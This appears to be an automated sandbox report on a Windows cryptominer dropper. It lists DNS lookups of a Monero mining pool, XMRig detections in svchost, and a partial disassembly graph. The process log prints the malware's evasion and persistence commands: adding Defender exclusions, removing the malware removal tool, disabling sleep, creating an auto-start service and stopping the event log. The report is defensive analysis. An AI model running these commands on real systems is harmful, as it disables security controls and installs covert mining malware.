                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 14, 2024 20:31:18.956768990 CET5927953192.168.2.81.1.1.1
                                                              Nov 14, 2024 20:31:18.964504957 CET53592791.1.1.1192.168.2.8

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 14, 2024 20:31:18.956768990 CET192.168.2.81.1.1.10x25d7Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                              Nov 14, 2024 20:31:18.964504957 CET1.1.1.1192.168.2.80x25d7No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Users\user\Desktop\rtYpMDeKUq.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\rtYpMDeKUq.exe"
                                                              Imagebase:0x7ff75e8e0000
                                                              File size:2'629'632 bytes
                                                              MD5 hash:9B1749C1BB9E8A354404B8A57DE68EC6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:14:31:11
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff67a410000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\wusa.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff6f1cb0000
                                                              File size:345'088 bytes
                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe delete "TASJBGYW"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:16
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:17
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:18
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe create "TASJBGYW" binpath= "C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe" start= "auto"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:19
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:20
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:21
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\sc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\sc.exe start "TASJBGYW"
                                                              Imagebase:0x7ff695370000
                                                              File size:72'192 bytes
                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:22
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:23
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:24
                                                              Start time:14:31:15
                                                              Start date:14/11/2024
                                                              Path:C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\ProgramData\teffcbdgtnay\lzsbffridksl.exe
                                                              Imagebase:0x7ff6cd200000
                                                              File size:2'629'632 bytes
                                                              MD5 hash:9B1749C1BB9E8A354404B8A57DE68EC6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 66%, ReversingLabs
                                                              Has exited:true

                                                              General

                                                              Target ID:25
                                                              Start time:14:31:16
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                              Imagebase:0x7ff6cb6b0000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:26
                                                              Start time:14:31:16
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:27
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff67a410000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:28
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:29
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:30
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:31
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:32
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:33
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:34
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                              Imagebase:0x7ff723a30000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:35
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:36
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:37
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:38
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:svchost.exe
                                                              Imagebase:0x7ff67e6d0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.1551425643.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736886046.0000020A9D080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2736858015.0000020A9D06B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000026.00000002.2735503667.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                              Has exited:false

                                                              General

                                                              Target ID:39
                                                              Start time:14:31:18
                                                              Start date:14/11/2024
                                                              Path:C:\Windows\System32\wusa.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                              Imagebase:0x7ff6f1cb0000
                                                              File size:345'088 bytes
                                                              MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:11.8%
                                                                Total number of Nodes:1578
                                                                Total number of Limit Nodes:2
                                                                execution_graph 2702 7ff75e8e1394 2706 7ff75e8e8420 2702->2706 2704 7ff75e8e13b8 2705 7ff75e8e13c6 NtOpenFile 2704->2705 2707 7ff75e8e843e 2706->2707 2708 7ff75e8e846b 2706->2708 2707->2704 2708->2707 2710 7ff75e8e8513 2708->2710 2709 7ff75e8e852f malloc 2711 7ff75e8e8550 2709->2711 2710->2709 2711->2707 4263 7ff75e8e1ab3 4264 7ff75e8e199e 4263->4264 4264->4263 4265 7ff75e8e1b36 4264->4265 4267 7ff75e8e19e9 VirtualProtect 4264->4267 4268 7ff75e8e1a0f 4264->4268 4266 7ff75e8e1ba0 4 API calls 4265->4266 4266->4268 4267->4264 4283 7ff75e8e1fd0 4284 7ff75e8e1fe4 4283->4284 4285 7ff75e8e2033 4283->4285 4284->4285 4286 7ff75e8e1ffd EnterCriticalSection LeaveCriticalSection 4284->4286 4286->4285 4287 7ff75e8e2050 4288 7ff75e8e20cf 4287->4288 4289 7ff75e8e205e EnterCriticalSection 4287->4289 4290 7ff75e8e20c2 LeaveCriticalSection 4289->4290 4291 7ff75e8e2079 4289->4291 4290->4288 4291->4290 4292 7ff75e8e20bd free 4291->4292 4292->4290 4304 7ff75e8e1a70 4305 7ff75e8e199e 4304->4305 4305->4304 4306 7ff75e8e19e9 VirtualProtect 4305->4306 4307 7ff75e8e1b36 4305->4307 4309 7ff75e8e1a0f 4305->4309 4306->4304 4306->4305 4308 7ff75e8e1ba0 4 API calls 4307->4308 4308->4309 4324 7ff75e8e1e10 4326 7ff75e8e1e2f 4324->4326 4325 7ff75e8e1eb5 4326->4325 4327 7ff75e8e1ecc 4326->4327 4330 7ff75e8e1e55 4326->4330 4327->4325 4328 7ff75e8e1ed3 signal 4327->4328 4328->4325 4329 7ff75e8e1ee4 4328->4329 4329->4325 4331 7ff75e8e1eea signal 4329->4331 4330->4325 4332 7ff75e8e1f12 signal 4330->4332 4331->4325 4332->4325 4310 7ff75e8e216f 4311 7ff75e8e2185 4310->4311 4312 7ff75e8e2178 InitializeCriticalSection 4310->4312 4312->4311 4293 7ff75e8e1f47 4294 7ff75e8e1e67 signal 4293->4294 4295 7ff75e8e1e99 4293->4295 4294->4295 4296 7ff75e8e1e7c 4294->4296 4296->4295 4297 7ff75e8e1e82 signal 4296->4297 4297->4295 4333 7ff75e8e2104 4334 7ff75e8e2111 EnterCriticalSection 4333->4334 4335 7ff75e8e2218 4333->4335 4336 7ff75e8e220b LeaveCriticalSection 4334->4336 4341 7ff75e8e212e 4334->4341 4337 7ff75e8e2272 4335->4337 4339 7ff75e8e2241 DeleteCriticalSection 4335->4339 4340 7ff75e8e2230 free 4335->4340 4336->4335 4338 7ff75e8e214d TlsGetValue GetLastError 4338->4341 4339->4337 4340->4339 4340->4340 4341->4336 4341->4338 4298 7ff75e8e1ac3 4299 7ff75e8e199e 4298->4299 4300 7ff75e8e1b36 4299->4300 4301 7ff75e8e1a0f 4299->4301 4303 7ff75e8e19e9 VirtualProtect 4299->4303 4302 7ff75e8e1ba0 4 API calls 4300->4302 4302->4301 4303->4299 4319 7ff75e8e1e65 4320 7ff75e8e1e67 signal 4319->4320 4321 7ff75e8e1e7c 4320->4321 4323 7ff75e8e1e99 4320->4323 4322 7ff75e8e1e82 signal 4321->4322 4321->4323 4322->4323 2712 7ff75e8e1140 2715 7ff75e8e1160 2712->2715 2714 7ff75e8e1156 2716 7ff75e8e118b 2715->2716 2717 7ff75e8e11b9 2715->2717 2716->2717 2720 7ff75e8e1190 2716->2720 2718 7ff75e8e11d3 2717->2718 2719 7ff75e8e11c7 _amsg_exit 2717->2719 2722 7ff75e8e1201 _initterm 2718->2722 2723 7ff75e8e121a 2718->2723 2719->2718 2720->2717 2721 7ff75e8e11a0 Sleep 2720->2721 2721->2717 2721->2720 2722->2723 2740 7ff75e8e1880 2723->2740 2725 7ff75e8e1247 SetUnhandledExceptionFilter 2726 7ff75e8e126a 2725->2726 2727 7ff75e8e126f malloc 2726->2727 2728 7ff75e8e128b 2727->2728 2731 7ff75e8e12d2 2727->2731 2729 7ff75e8e12a0 strlen malloc memcpy 2728->2729 2729->2729 2730 7ff75e8e12d0 2729->2730 2730->2731 2750 7ff75e8e3b50 2731->2750 2733 7ff75e8e1315 2734 7ff75e8e1344 2733->2734 2735 7ff75e8e1324 2733->2735 2738 7ff75e8e1160 93 API calls 2734->2738 2736 7ff75e8e132d _cexit 2735->2736 2737 7ff75e8e1338 2735->2737 2736->2737 2737->2714 2739 7ff75e8e1366 2738->2739 2739->2714 2741 7ff75e8e18a2 2740->2741 2746 7ff75e8e1a0f 2740->2746 2742 7ff75e8e1956 2741->2742 2745 7ff75e8e199e 2741->2745 2741->2746 2742->2745 2925 7ff75e8e1ba0 2742->2925 2744 7ff75e8e19e9 VirtualProtect 2744->2745 2745->2744 2745->2746 2747 7ff75e8e1b36 2745->2747 2746->2725 2748 7ff75e8e1ba0 4 API calls 2747->2748 2749 7ff75e8e1b53 2748->2749 2749->2746 2753 7ff75e8e3b66 2750->2753 2751 7ff75e8e3c60 wcslen 2935 7ff75e8e153f 2751->2935 2753->2751 2757 7ff75e8e3d60 2760 7ff75e8e3d7a memset wcscat memset 2757->2760 2763 7ff75e8e3dd3 2760->2763 2762 7ff75e8e3e23 wcslen 2764 7ff75e8e3e35 2762->2764 2768 7ff75e8e3e7c 2762->2768 2763->2762 